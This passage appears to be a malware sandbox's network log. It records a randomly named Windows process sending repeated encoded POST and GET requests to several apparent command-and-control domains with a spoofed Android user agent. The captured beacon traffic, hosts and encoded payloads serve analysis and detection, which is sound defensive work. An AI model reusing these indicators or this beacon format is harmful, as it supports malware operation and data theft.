                                                              16 | 192.168.2.7 | 59677 | 65.108.194.49 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:55:51.461838961 CEST | 438 | OUT | GET /bzo0/?XvhP6L=LIXiKjrn46ImfNwK8V7IO/63eExm4wt8Rco3TcvXyZwdjjwGs6M9l9CGkhiW2SEXU7ruhxF2seiA/QjkQNJaG2u4gbNAblhhoQ1gDEQNJfkHQy2ZHSzBRH3GV2HuvCcAuSJmx/oWCvWI&Xt7D=9p4tP8lp52ndpXM HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Host: www.maya24.xyz
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:55:52.282370090 CEST | 517 | IN | HTTP/1.1 301 Moved Permanently
                                                              Connection: close
                                                              x-powered-by: PHP/7.4.33
                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                              cache-control: no-cache, must-revalidate, max-age=0
                                                              content-type: text/html; charset=UTF-8
                                                              x-redirect-by: WordPress
                                                              location: http://maya24.xyz/bzo0/?XvhP6L=LIXiKjrn46ImfNwK8V7IO/63eExm4wt8Rco3TcvXyZwdjjwGs6M9l9CGkhiW2SEXU7ruhxF2seiA/QjkQNJaG2u4gbNAblhhoQ1gDEQNJfkHQy2ZHSzBRH3GV2HuvCcAuSJmx/oWCvWI&Xt7D=9p4tP8lp52ndpXM
                                                              content-length: 0
                                                              date: Wed, 11 Sep 2024 20:55:52 GMT
                                                              server: LiteSpeed


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              17 | 192.168.2.7 | 59678 | 208.91.197.13 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:55:57.619843006 CEST | 696 | OUT | POST /pa4w/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.hiretemp.net
                                                              Origin: http://www.hiretemp.net
                                                              Cache-Control: max-age=0
                                                              Content-Length: 219
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.hiretemp.net/pa4w/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 51 49 6b 6e 51 70 73 74 62 67 5a 52 6f 75 47 44 51 31 66 4d 78 66 52 66 63 51 6e 64 56 35 7a 6e 31 61 38 56 62 49 52 4c 67 6c 70 6b 4c 37 55 6e 6a 67 6c 49 74 77 56 58 7a 44 45 58 64 65 66 4a 6d 72 66 52 32 41 6f 47 6f 69 35 61 6b 38 32 63 79 48 4e 4f 4f 2f 63 6a 34 61 7a 31 50 63 45 63 45 61 41 7a 78 37 37 31 57 64 2b 73 55 4e 77 50 6a 4d 4f 59 4e 5a 74 39 6f 72 70 64 49 71 4f 61 52 75 4f 63 61 59 4f 46 41 32 33 65 59 6d 50 4f 31 61 48 75 2f 35 6f 75 37 56 4f 77 56 4b 6c 42 39 4d 43 6d 56 73 45 78 55 45 6c 74 6b 39 71 63 31 77 4c 6d 76 38 50 76 6f 56 4e 78 46 69 6c 69 4f 74 76 37 73 37 32 59 54 47 66 30 70 67 71 73 66 67 3d 3d
                                                              Data Ascii: XvhP6L=QIknQpstbgZRouGDQ1fMxfRfcQndV5zn1a8VbIRLglpkL7UnjglItwVXzDEXdefJmrfR2AoGoi5ak82cyHNOO/cj4az1PcEcEaAzx771Wd+sUNwPjMOYNZt9orpdIqOaRuOcaYOFA23eYmPO1aHu/5ou7VOwVKlB9MCmVsExUEltk9qc1wLmv8PvoVNxFiliOtv7s72YTGf0pgqsfg==


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              18 | 192.168.2.7 | 59679 | 208.91.197.13 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:56:00.164180994 CEST | 716 | OUT | POST /pa4w/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.hiretemp.net
                                                              Origin: http://www.hiretemp.net
                                                              Cache-Control: max-age=0
                                                              Content-Length: 239
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.hiretemp.net/pa4w/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 51 49 6b 6e 51 70 73 74 62 67 5a 52 79 4f 32 44 63 32 33 4d 35 66 52 65 42 67 6e 64 65 5a 7a 5a 31 64 30 56 62 4a 56 62 68 57 4e 6b 4c 61 49 6e 78 31 4a 49 73 77 56 58 37 6a 45 4f 54 2b 66 43 6d 72 43 6d 32 41 45 47 6f 6a 64 61 6b 35 4b 63 7a 30 56 50 4f 76 63 39 68 4b 7a 33 4c 63 45 63 45 61 41 7a 78 36 4b 65 57 64 6d 73 55 59 34 50 78 64 4f 5a 4f 5a 74 2b 76 72 70 64 65 71 4f 65 52 75 50 4a 61 5a 53 37 41 30 66 65 59 6d 66 4f 31 49 2f 76 77 35 6f 6f 31 31 4f 6e 65 34 38 36 38 4a 71 39 58 36 4d 2b 4e 32 46 37 73 72 33 2b 76 53 48 4b 78 74 33 55 73 58 70 48 53 45 34 58 4d 73 72 6a 68 5a 43 35 4d 78 36 65 6b 79 4c 6f 4a 66 51 38 72 4e 39 6d 43 30 6e 2b 45 67 33 75 42 66 4d 4b 4e 4e 30 3d
                                                              Data Ascii: XvhP6L=QIknQpstbgZRyO2Dc23M5fReBgndeZzZ1d0VbJVbhWNkLaInx1JIswVX7jEOT+fCmrCm2AEGojdak5Kcz0VPOvc9hKz3LcEcEaAzx6KeWdmsUY4PxdOZOZt+vrpdeqOeRuPJaZS7A0feYmfO1I/vw5oo11One4868Jq9X6M+N2F7sr3+vSHKxt3UsXpHSE4XMsrjhZC5Mx6ekyLoJfQ8rN9mC0n+Eg3uBfMKNN0=


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              19 | 192.168.2.7 | 59680 | 208.91.197.13 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:56:02.725509882 CEST | 1729 | OUT | POST /pa4w/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.hiretemp.net
                                                              Origin: http://www.hiretemp.net
                                                              Cache-Control: max-age=0
                                                              Content-Length: 1251
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.hiretemp.net/pa4w/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 51 49 6b 6e 51 70 73 74 62 67 5a 52 79 4f 32 44 63 32 33 4d 35 66 52 65 42 67 6e 64 65 5a 7a 5a 31 64 30 56 62 4a 56 62 68 57 46 6b 4c 49 73 6e 6a 47 52 49 72 77 56 58 31 44 45 54 54 2b 66 66 6d 72 4b 69 32 41 59 34 6f 67 31 61 32 72 53 63 6a 56 56 50 42 76 63 39 38 61 7a 79 50 63 45 4a 45 61 52 36 78 36 36 65 57 64 6d 73 55 66 49 50 79 4d 4f 5a 49 5a 74 39 6f 72 70 5a 49 71 4f 32 52 75 32 2b 61 5a 47 72 44 45 2f 65 59 48 76 4f 77 39 72 76 35 35 6f 71 32 31 50 69 65 34 41 6c 38 50 4f 66 58 36 52 6c 4e 31 56 37 2f 50 36 71 30 52 72 57 74 63 58 65 74 32 4e 45 5a 56 4d 33 4c 4d 33 4d 67 36 32 61 51 69 75 68 6c 43 4c 39 4b 4a 46 73 36 63 78 48 61 41 76 74 55 30 71 33 59 65 49 75 62 62 79 52 4f 54 37 4a 6f 76 37 67 4f 73 79 5a 2f 52 6b 6a 50 58 4a 41 62 77 6f 79 48 67 41 44 57 51 36 32 7a 48 75 45 65 46 6d 67 35 6e 41 52 39 44 45 5a 2f 39 54 6e 45 62 4a 37 77 68 78 55 59 63 36 78 70 4f 36 53 63 51 64 74 44 4b 57 46 71 64 53 6e 36 46 6b 65 44 37 61 4d 61 6c 48 47 44 31 31 6d 62 57 7a [TRUNCATED]
                                                              Data Ascii: XvhP6L= [TRUNCATED]


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              20 | 192.168.2.7 | 59681 | 208.91.197.13 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:56:05.269747972 CEST | 440 | OUT | GET /pa4w/?XvhP6L=dKMHTeotdxQA3vuiSRDg588JUBKwJbza89FzR4k2/BlHdZNbjG9srDVj4iYsPfHZhZaT/x4F9RFLyq608nYJAYQb5LXQOtEiJ4lw7e+xANqPS8JKy934Fa9hsYgKS5KVWYuJXZeSCWTj&Xt7D=9p4tP8lp52ndpXM HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Host: www.hiretemp.net
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:56:06.275540113 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                              Date: Wed, 11 Sep 2024 20:56:05 GMT
                                                              Server: Apache
                                                              Referrer-Policy: no-referrer-when-downgrade
                                                              Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                              Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                              Set-Cookie: vsid=910vr4736337658330479; expires=Mon, 10-Sep-2029 20:56:05 GMT; Max-Age=157680000; path=/; domain=www.hiretemp.net; HttpOnly
                                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Do9FUAT99flEOqyV/H6pIxyme4j01TUt1aIq8Mcxd2bhNPifQ752OEZfxH8Djv2KDFYapgx/HqN0LtgowuT7TQ==
                                                              Transfer-Encoding: chunked
                                                              Content-Type: text/html; charset=UTF-8
                                                              Connection: close


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              21 | 192.168.2.7 | 59682 | 76.223.113.161 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:56:11.669253111 CEST | 696 | OUT | POST /otqc/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.justlivn.net
                                                              Origin: http://www.justlivn.net
                                                              Cache-Control: max-age=0
                                                              Content-Length: 219
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.justlivn.net/otqc/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 75 6d 58 57 63 59 54 51 68 36 6e 73 52 32 65 65 48 4e 72 6e 6d 5a 74 6f 56 33 57 77 55 32 44 6e 6a 62 69 42 6d 6c 72 7a 48 6f 66 7a 72 77 6c 4d 69 43 78 65 52 30 6e 31 33 37 7a 4f 4f 30 6b 32 34 70 54 72 62 71 73 73 62 6e 5a 52 4d 7a 33 6c 6e 48 53 4b 38 46 2f 37 49 31 2f 6f 4e 46 7a 62 75 43 35 69 31 66 78 43 75 6d 6c 74 79 4c 30 39 69 57 43 2b 56 56 50 6b 33 79 74 59 67 36 46 78 78 34 2b 44 31 53 68 65 43 2f 35 63 45 68 7a 49 6e 79 32 61 64 38 6f 6b 77 4e 62 58 61 70 78 74 63 61 4f 74 64 45 66 2f 5a 72 2f 78 47 36 6f 66 41 5a 75 4b 39 37 74 2b 6d 61 75 6e 59 6f 4f 2f 39 47 52 30 58 36 30 41 4f 4c 33 57 2b 55 59 4e 4c 51 3d 3d
                                                              Data Ascii: XvhP6L=umXWcYTQh6nsR2eeHNrnmZtoV3WwU2DnjbiBmlrzHofzrwlMiCxeR0n137zOO0k24pTrbqssbnZRMz3lnHSK8F/7I1/oNFzbuC5i1fxCumltyL09iWC+VVPk3ytYg6Fxx4+D1SheC/5cEhzIny2ad8okwNbXapxtcaOtdEf/Zr/xG6ofAZuK97t+maunYoO/9GR0X60AOL3W+UYNLQ==
                                                              Sep 11, 2024 22:56:12.113015890 CEST | 208 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.27.0
                                                              Date: Wed, 11 Sep 2024 20:56:12 GMT
                                                              Content-Type: application/octet-stream
                                                              Content-Length: 25
                                                              Connection: close
                                                              Content-Type: text/plain
                                                              Data Raw: 42 72 61 6e 64 20 50 61 67 65 20 43 75 73 74 6f 6d 20 44 6f 6d 61 69 6e 73
                                                              Data Ascii: Brand Page Custom Domains


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              22 | 192.168.2.7 | 59683 | 76.223.113.161 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:56:14.434725046 CEST | 716 | OUT | POST /otqc/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.justlivn.net
                                                              Origin: http://www.justlivn.net
                                                              Cache-Control: max-age=0
                                                              Content-Length: 239
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.justlivn.net/otqc/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 75 6d 58 57 63 59 54 51 68 36 6e 73 58 56 47 65 42 71 2f 6e 67 35 74 70 49 48 57 77 50 47 44 37 6a 62 75 42 6d 6b 76 6a 47 61 37 7a 72 52 56 4d 77 77 4a 65 53 30 6e 31 77 4c 7a 4c 54 45 6b 39 34 70 66 56 62 71 67 73 62 6d 35 52 4d 33 7a 6c 6d 77 4f 46 39 56 2f 31 52 46 2f 35 4a 46 7a 62 75 43 35 69 31 66 6c 6f 75 6d 64 74 79 61 45 39 67 7a 75 2f 4c 6c 50 6c 68 43 74 59 33 4b 46 31 78 34 2b 31 31 58 35 30 43 38 42 63 45 68 6a 49 6e 6e 43 5a 58 38 6f 71 76 39 61 5a 61 49 51 34 51 59 71 4a 63 32 57 69 44 49 4c 51 48 4d 31 39 61 37 69 6d 6a 71 56 46 69 59 4b 52 50 4f 54 4b 2f 48 56 73 61 59 41 68 52 38 53 38 7a 47 35 4a 64 76 77 53 69 35 49 56 66 75 39 54 6a 32 47 4a 64 30 30 2f 2f 4e 55 3d
                                                              Data Ascii: XvhP6L=umXWcYTQh6nsXVGeBq/ng5tpIHWwPGD7jbuBmkvjGa7zrRVMwwJeS0n1wLzLTEk94pfVbqgsbm5RM3zlmwOF9V/1RF/5JFzbuC5i1floumdtyaE9gzu/LlPlhCtY3KF1x4+11X50C8BcEhjInnCZX8oqv9aZaIQ4QYqJc2WiDILQHM19a7imjqVFiYKRPOTK/HVsaYAhR8S8zG5JdvwSi5IVfu9Tj2GJd00//NU=
                                                              Sep 11, 2024 22:56:14.878710985 CEST | 208 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.27.0
                                                              Date: Wed, 11 Sep 2024 20:56:14 GMT
                                                              Content-Type: application/octet-stream
                                                              Content-Length: 25
                                                              Connection: close
                                                              Content-Type: text/plain
                                                              Data Ascii: Brand Page Custom Domains


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              23 | 192.168.2.7 | 59684 | 76.223.113.161 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:56:17.101314068 CEST | 1729 | OUT | POST /otqc/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.justlivn.net
                                                              Origin: http://www.justlivn.net
                                                              Cache-Control: max-age=0
                                                              Content-Length: 1251
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.justlivn.net/otqc/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Ascii: XvhP6L= [TRUNCATED]
                                                              Sep 11, 2024 22:56:17.543169022 CEST | 208 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.27.0
                                                              Date: Wed, 11 Sep 2024 20:56:17 GMT
                                                              Content-Type: application/octet-stream
                                                              Content-Length: 25
                                                              Connection: close
                                                              Content-Type: text/plain
                                                              Data Ascii: Brand Page Custom Domains


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              24 | 192.168.2.7 | 59685 | 76.223.113.161 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:56:19.644325018 CEST | 440 | OUT | GET /otqc/?XvhP6L=jk/2fo7CpY6PXlaYArzRtoo0AVLLUFDN/Jq+vkOaZ+fPrhUhiTNdX0aA543JRHsuzYf7ebB3TDQsHlnmoSav9wzbQDyRMAafsyNd6ddZozZF1KxmmUfcLkKv5xld9bF92o+2nx1DI9Jm&Xt7D=9p4tP8lp52ndpXM HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Host: www.justlivn.net
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:56:20.095751047 CEST | 208 | IN | HTTP/1.1 200 OK
                                                              Server: nginx/1.27.0
                                                              Date: Wed, 11 Sep 2024 20:56:20 GMT
                                                              Content-Type: application/octet-stream
                                                              Content-Length: 25
                                                              Connection: close
                                                              Content-Type: text/plain
                                                              Data Ascii: Brand Page Custom Domains


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              25 | 192.168.2.7 | 59686 | 172.67.221.5 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:56:25.159265995 CEST | 708 | OUT | POST /d4mx/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.hemistryb.online
                                                              Origin: http://www.hemistryb.online
                                                              Cache-Control: max-age=0
                                                              Content-Length: 219
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.hemistryb.online/d4mx/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Ascii: XvhP6L=QaW8blO59ScsfiUSGoeNdPw+0OzQaIxOaFecgSD65PnYkG45fUtP0s50V0wuuSvln71UdJMx5kgLqOLTeFBbsVuRkuF+GWwIX+nJ5Kl7DgpgAgQWrZy5sls8MAPaX1NI2YY9dG52stSpzc0EfIDzrTFcFiGQLQxqEw+sIDv3nounBzWoblOhCH/EmevkSXh8cs0qlVnuTVaOQ7JLRw==
                                                              Sep 11, 2024 22:56:25.850508928 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                              Date: Wed, 11 Sep 2024 20:56:25 GMT
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              x-ray: wnp32840:0.000/wn32840:0.000/wa32840:D=595
                                                              cf-cache-status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U%2B8Bx%2FvD%2BD58gbtVfOPIMqiEsPHnxZn9TZSuLJMW7WKUSODGh77EZCfzQwAxgE6FG1o5jy1s7F0cipLj57WwOs1xY9aTRjHVMqJ6loSs3Dc96mbQwxlMn5IlyE4Ap4loFYyp0aAALw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8c1a9077a8e942fe-EWR
                                                              Content-Encoding: gzip
                                                              alt-svc: h3=":443"; ma=86400
                                                              Sep 11, 2024 22:56:25.850532055 CEST | 176 | IN |


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              26 | 192.168.2.7 | 59687 | 172.67.221.5 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:56:27.713248014 CEST | 728 | OUT | POST /d4mx/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.hemistryb.online
                                                              Origin: http://www.hemistryb.online
                                                              Cache-Control: max-age=0
                                                              Content-Length: 239
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.hemistryb.online/d4mx/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Ascii: XvhP6L=QaW8blO59ScsNTkSV72Navw94uzQUowHaFScgTGh65/Yli85eVtP3s50SExkqSvsn74rdIwx5kkLqObTZ2pEsFufiuF8CWwIX+nJ5ONVDgxgAQgWq4y2zVs/PAPacVNM2YYfdENQsoOpzdEEfZD0yjEVYSHdBzUuaQSCJzzhi/alAFLKBHCNcWH/icLSFx8Jetwyo3TPMi/kdpoPHCMqcG1Fx4Usuc9KbMm/8Bw=
                                                              Sep 11, 2024 22:56:28.425606966 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                              Date: Wed, 11 Sep 2024 20:56:28 GMT
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              x-ray: wnp32840:0.000/wn32840:0.000/wa32840:D=894
                                                              cf-cache-status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I%2FPYBh6H0Q5SOHN0EnsLhWcpHP1V7JQPSZ9nLMbTaX95j%2FZO8FtAMnGCUvxDIuh1QOPtQ4CxNV9IYoJZLyrkU%2FY9etjyR8ElIVYf2lZ17RjSioac8BA7iksPiztKtd2pHaRaaGc%2BDA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8c1a9087cb3c7d0b-EWR
                                                              Content-Encoding: gzip
                                                              alt-svc: h3=":443"; ma=86400
                                                              Sep 11, 2024 22:56:28.425683022 CEST | 173 | IN |


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              27 | 192.168.2.7 | 59688 | 172.67.221.5 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:56:30.255604029 CEST | 1741 | OUT | POST /d4mx/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.hemistryb.online
                                                              Origin: http://www.hemistryb.online
                                                              Cache-Control: max-age=0
                                                              Content-Length: 1251
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.hemistryb.online/d4mx/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Ascii: XvhP6L= [TRUNCATED]
                                                              Sep 11, 2024 22:56:30.947381020 CEST | 677 | IN | HTTP/1.1 404 Not Found
                                                              Date: Wed, 11 Sep 2024 20:56:30 GMT
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              x-ray: wnp32840:0.000/wn32840:0.000/wa32840:D=866
                                                              cf-cache-status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XcmG%2BstF6QGZ3oibJ9DO34QDsAYaexsuimzHvXyKGaxujZHsa84k92L54bVeYZc%2FHvuRSlXSbKLUXGlfbRYz9G%2BBfBAnZ386APMZYl%2BL4qmoArx%2F1BhPTfVbFzbnOM9WEQB%2FDN3zaw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8c1a90978c0d72a7-EWR
                                                              Content-Encoding: gzip
                                                              alt-svc: h3=":443"; ma=86400
                                                              Sep 11, 2024 22:56:30.949126005 CEST | 751 | IN |


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              28 | 192.168.2.7 | 59689 | 172.67.221.5 | 80 | 5428 | C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 11, 2024 22:56:32.800508976 CEST | 444 | OUT | GET /d4mx/?XvhP6L=dY+cYSKR0CxOBgdKC/uIXP8qwtWtKpkmZkr6gQOthvr2txBeH3FPzsd2b0Ib6yOB9b4SVKkLzFRco8LgeUNZml6ApuBXHFQ5XcnL1KhmECBVWCNPjbmPvAwvE3fQeXhC94EGXV5DutCK&Xt7D=9p4tP8lp52ndpXM HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Host: www.hemistryb.online
                                                              Connection: close
